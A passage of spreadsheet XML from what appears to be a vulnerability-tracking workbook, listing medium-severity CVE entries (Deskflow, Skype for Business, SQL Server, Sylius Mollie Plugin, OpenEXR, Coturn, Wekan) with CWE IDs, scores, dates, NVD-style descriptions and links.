      <c r="A3921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65976</t>
        </is>
      </c>
      <c r="C3921" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3921" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3921" s="5" t="inlineStr"/>
      <c r="F3921" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3921" s="5" t="inlineStr"/>
      <c r="H3921" s="5" t="inlineStr"/>
      <c r="I3921" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3921" s="5" t="inlineStr"/>
      <c r="K3921" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3921" s="5" t="inlineStr">
        <is>
          <t>Deskflow is a keyboard and mouse sharing app. From 1.17.0 until continuous build 1.26.0.300, a connected peer can send repeated DCLP DataChunk messages to ClipboardChunk::assemble() in src/lib/deskflow/ClipboardChunk.cpp, causing the server path in src/lib/server/ClientProxy1_6.cpp or client path in src/lib/client/ServerProxy.cpp to append data beyond the DataStart declared size and configured clipboard limit before DataEnd validation, exhausting receiver memory. This issue is fixed in continuous build 1.26.0.300.</t>
        </is>
      </c>
      <c r="M3921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65976</t>
        </is>
      </c>
    </row>
    <row r="3922">
      <c r="A3922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66303</t>
        </is>
      </c>
      <c r="C3922" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3922" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3922" s="5" t="inlineStr"/>
      <c r="F3922" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G3922" s="5" t="inlineStr"/>
      <c r="H3922" s="5" t="inlineStr"/>
      <c r="I3922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3922" s="5" t="inlineStr"/>
      <c r="K3922" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3922" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Skype for Business allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66303</t>
        </is>
      </c>
    </row>
    <row r="3923">
      <c r="A3923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66306</t>
        </is>
      </c>
      <c r="C3923" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3923" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3923" s="5" t="inlineStr"/>
      <c r="F3923" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3923" s="5" t="inlineStr"/>
      <c r="H3923" s="5" t="inlineStr"/>
      <c r="I3923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3923" s="5" t="inlineStr"/>
      <c r="K3923" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L3923" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66306</t>
        </is>
      </c>
    </row>
    <row r="3924">
      <c r="A3924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66308</t>
        </is>
      </c>
      <c r="C3924" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3924" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3924" s="5" t="inlineStr"/>
      <c r="F3924" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3924" s="5" t="inlineStr"/>
      <c r="H3924" s="5" t="inlineStr"/>
      <c r="I3924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3924" s="5" t="inlineStr"/>
      <c r="K3924" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3924" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Skype for Business allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66308</t>
        </is>
      </c>
    </row>
    <row r="3925">
      <c r="A3925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66632</t>
        </is>
      </c>
      <c r="C3925" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3925" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3925" s="5" t="inlineStr"/>
      <c r="F3925" s="5" t="inlineStr"/>
      <c r="G3925" s="5" t="inlineStr"/>
      <c r="H3925" s="5" t="inlineStr"/>
      <c r="I3925" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3925" s="5" t="inlineStr"/>
      <c r="K3925" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3925" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Content Injection in Simple Cloudflare Turnstile &lt;= 1.42.1 versions.</t>
        </is>
      </c>
      <c r="M3925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66632</t>
        </is>
      </c>
    </row>
    <row r="3926">
      <c r="A3926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66816</t>
        </is>
      </c>
      <c r="C3926" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3926" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3926" s="5" t="inlineStr"/>
      <c r="F3926" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3926" s="5" t="inlineStr"/>
      <c r="H3926" s="5" t="inlineStr"/>
      <c r="I3926" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3926" s="5" t="inlineStr"/>
      <c r="K3926" s="5" t="inlineStr">
        <is>
          <t>CWE-778</t>
        </is>
      </c>
      <c r="L3926" s="5" t="inlineStr">
        <is>
          <t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M3926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t>
        </is>
      </c>
    </row>
    <row r="3927">
      <c r="A3927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67369</t>
        </is>
      </c>
      <c r="C3927" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3927" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3927" s="5" t="inlineStr"/>
      <c r="F3927" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3927" s="5" t="inlineStr"/>
      <c r="H3927" s="5" t="inlineStr"/>
      <c r="I3927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3927" s="5" t="inlineStr"/>
      <c r="K3927" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3927" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t>
        </is>
      </c>
    </row>
    <row r="3928">
      <c r="A3928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67383</t>
        </is>
      </c>
      <c r="C3928" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3928" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3928" s="5" t="inlineStr"/>
      <c r="F3928" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G3928" s="5" t="inlineStr"/>
      <c r="H3928" s="5" t="inlineStr"/>
      <c r="I3928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3928" s="5" t="inlineStr"/>
      <c r="K3928" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L3928" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t>
        </is>
      </c>
    </row>
    <row r="3929">
      <c r="A3929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67386</t>
        </is>
      </c>
      <c r="C3929" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3929" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3929" s="5" t="inlineStr"/>
      <c r="F3929" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3929" s="5" t="inlineStr"/>
      <c r="H3929" s="5" t="inlineStr"/>
      <c r="I3929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3929" s="5" t="inlineStr"/>
      <c r="K3929" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L3929" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t>
        </is>
      </c>
    </row>
    <row r="3930">
      <c r="A3930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67389</t>
        </is>
      </c>
      <c r="C3930" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3930" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3930" s="5" t="inlineStr"/>
      <c r="F3930" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3930" s="5" t="inlineStr"/>
      <c r="H3930" s="5" t="inlineStr"/>
      <c r="I3930" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3930" s="5" t="inlineStr"/>
      <c r="K3930" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3930" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t>
        </is>
      </c>
    </row>
    <row r="3931">
      <c r="A3931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67390</t>
        </is>
      </c>
      <c r="C3931" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3931" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3931" s="5" t="inlineStr"/>
      <c r="F3931" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G3931" s="5" t="inlineStr"/>
      <c r="H3931" s="5" t="inlineStr"/>
      <c r="I3931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3931" s="5" t="inlineStr"/>
      <c r="K3931" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L3931" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t>
        </is>
      </c>
    </row>
    <row r="3932">
      <c r="A3932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67393</t>
        </is>
      </c>
      <c r="C3932" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3932" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3932" s="5" t="inlineStr"/>
      <c r="F3932" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3932" s="5" t="inlineStr"/>
      <c r="H3932" s="5" t="inlineStr"/>
      <c r="I3932" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3932" s="5" t="inlineStr"/>
      <c r="K3932" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L3932" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t>
        </is>
      </c>
    </row>
    <row r="3933">
      <c r="A3933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67624</t>
        </is>
      </c>
      <c r="C3933" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3933" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3933" s="5" t="inlineStr"/>
      <c r="F3933" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3933" s="5" t="inlineStr"/>
      <c r="H3933" s="5" t="inlineStr"/>
      <c r="I3933" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3933" s="5" t="inlineStr"/>
      <c r="K3933" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3933" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67624</t>
        </is>
      </c>
    </row>
    <row r="3934">
      <c r="A3934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67629</t>
        </is>
      </c>
      <c r="C3934" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3934" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3934" s="5" t="inlineStr"/>
      <c r="F3934" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3934" s="5" t="inlineStr"/>
      <c r="H3934" s="5" t="inlineStr"/>
      <c r="I3934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3934" s="5" t="inlineStr"/>
      <c r="K3934" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3934" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67629</t>
        </is>
      </c>
    </row>
    <row r="3935">
      <c r="A3935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67630</t>
        </is>
      </c>
      <c r="C3935" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3935" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3935" s="5" t="inlineStr"/>
      <c r="F3935" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3935" s="5" t="inlineStr"/>
      <c r="H3935" s="5" t="inlineStr"/>
      <c r="I3935" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3935" s="5" t="inlineStr"/>
      <c r="K3935" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3935" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67630</t>
        </is>
      </c>
    </row>
    <row r="3936">
      <c r="A3936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67633</t>
        </is>
      </c>
      <c r="C3936" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3936" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3936" s="5" t="inlineStr"/>
      <c r="F3936" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G3936" s="5" t="inlineStr"/>
      <c r="H3936" s="5" t="inlineStr"/>
      <c r="I3936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3936" s="5" t="inlineStr"/>
      <c r="K3936" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3936" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t>
        </is>
      </c>
    </row>
    <row r="3937">
      <c r="A3937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67641</t>
        </is>
      </c>
      <c r="C3937" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3937" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3937" s="5" t="inlineStr"/>
      <c r="F3937" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3937" s="5" t="inlineStr"/>
      <c r="H3937" s="5" t="inlineStr"/>
      <c r="I3937" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3937" s="5" t="inlineStr"/>
      <c r="K3937" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3937" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t>
        </is>
      </c>
    </row>
    <row r="3938">
      <c r="A3938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67645</t>
        </is>
      </c>
      <c r="C3938" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3938" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3938" s="5" t="inlineStr"/>
      <c r="F3938" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3938" s="5" t="inlineStr"/>
      <c r="H3938" s="5" t="inlineStr"/>
      <c r="I3938" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3938" s="5" t="inlineStr"/>
      <c r="K3938" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3938" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t>
        </is>
      </c>
    </row>
    <row r="3939">
      <c r="A3939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67648</t>
        </is>
      </c>
      <c r="C3939" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3939" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3939" s="5" t="inlineStr"/>
      <c r="F3939" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3939" s="5" t="inlineStr"/>
      <c r="H3939" s="5" t="inlineStr"/>
      <c r="I3939" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3939" s="5" t="inlineStr"/>
      <c r="K3939" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L3939" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t>
        </is>
      </c>
    </row>
    <row r="3940">
      <c r="A3940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68501</t>
        </is>
      </c>
      <c r="C3940" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3940" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3940" s="5" t="inlineStr"/>
      <c r="F3940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3940" s="5" t="inlineStr"/>
      <c r="H3940" s="5" t="inlineStr"/>
      <c r="I3940" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J3940" s="5" t="inlineStr"/>
      <c r="K3940" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3940" s="5" t="inlineStr">
        <is>
          <t>Sylius Mollie Plugin provides Mollie payment integration for Sylius applications. Prior to 2.2.8, 3.2.4, and 3.3.1, Sylius Mollie Plugin's GET /{_locale}/thank-you PageRedirectController::thankYouAction and GET /{_locale}/get-code QrCodeAction::fetchQrCodeFromOrder endpoints look up sequential orderId values without ownership or session checks, exposing order tokenValue values that can be used with GET /{_locale}/register-after-checkout/{tokenValue} to view customer first name, last name, and email. This issue is fixed in 2.2.8, 3.2.4, and 3.3.1.</t>
        </is>
      </c>
      <c r="M3940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68501</t>
        </is>
      </c>
    </row>
    <row r="3941">
      <c r="A3941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68516</t>
        </is>
      </c>
      <c r="C3941" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3941" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3941" s="5" t="inlineStr"/>
      <c r="F3941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3941" s="5" t="inlineStr"/>
      <c r="H3941" s="5" t="inlineStr"/>
      <c r="I3941" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3941" s="5" t="inlineStr"/>
      <c r="K3941" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-787</t>
        </is>
      </c>
      <c r="L3941" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. From version 3.4.0 through 3.4.13, a crafted HTJ2K-compressed EXR can crash OpenEXR during normal decode. An HTJ2K-compressed EXR whose JPEG 2000 SIZ fields place the first tile outside the visible image can reach invalid tile and codeblock geometry in the vendored OpenJPH AVX2 decoder, causing a stack out-of-bounds write and denial of service. OpenEXR's HTJ2K path validates the decoded codestream dimensions against the EXR chunk size, but it does not reject SIZ image-offset/tile-grid geometry where the first tile does not intersect the image. This issue is fixed in version 3.4.14.</t>
        </is>
      </c>
      <c r="M3941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68516</t>
        </is>
      </c>
    </row>
    <row r="3942">
      <c r="A3942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68555</t>
        </is>
      </c>
      <c r="C3942" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3942" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3942" s="5" t="inlineStr"/>
      <c r="F3942" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3942" s="5" t="inlineStr"/>
      <c r="H3942" s="5" t="inlineStr"/>
      <c r="I3942" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3942" s="5" t="inlineStr"/>
      <c r="K3942" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3942" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. In 4.15.0, an authenticated TURN user can repeatedly resume one allocation from fresh UDP 5-tuples without completing a handoff when the server enables --mobility. mobile_begin_transition() in src/server/ns_turn_server.c disarms each new session's allocation timeout and overwrites the allocation's single mobile_pending_resume link, leaving earlier pending sessions unreachable by the cleanup path, while copy_auth_parameters() ignores inc_quota() failure. The attacker can therefore retain unbounded server-side sessions and exhaust process memory even when --user-quota=1 is configured. This issue is fixed in version 4.16.0.</t>
        </is>
      </c>
      <c r="M3942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68555</t>
        </is>
      </c>
    </row>
    <row r="3943">
      <c r="A3943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68559</t>
        </is>
      </c>
      <c r="C3943" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3943" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3943" s="5" t="inlineStr"/>
      <c r="F3943" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3943" s="5" t="inlineStr"/>
      <c r="H3943" s="5" t="inlineStr"/>
      <c r="I3943" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3943" s="5" t="inlineStr"/>
      <c r="K3943" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3943" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. From 9.57 until 9.74, the /api/boards/:boardId/exportExcel route in models/exportExcel.js called the asynchronous exporterExcel.canExport(user) authorization guard from models/server/ExporterExcel.js without awaiting it. The returned Promise was always truthy, so exporterExcel.build(res) ran even when board.isVisibleBy(user) would deny access, allowing any authenticated non-member to download private board card titles, descriptions, lists, swimlanes, members, and metadata. This issue is fixed in version 9.74.</t>
        </is>
      </c>
      <c r="M3943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68559</t>
        </is>
      </c>
    </row>
    <row r="3944">
      <c r="A3944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68776</t>
        </is>
      </c>
      <c r="C3944" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3944" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3944" s="5" t="inlineStr"/>
      <c r="F3944" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3944" s="5" t="inlineStr"/>
      <c r="H3944" s="5" t="inlineStr"/>
      <c r="I3944" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3944" s="5" t="inlineStr"/>
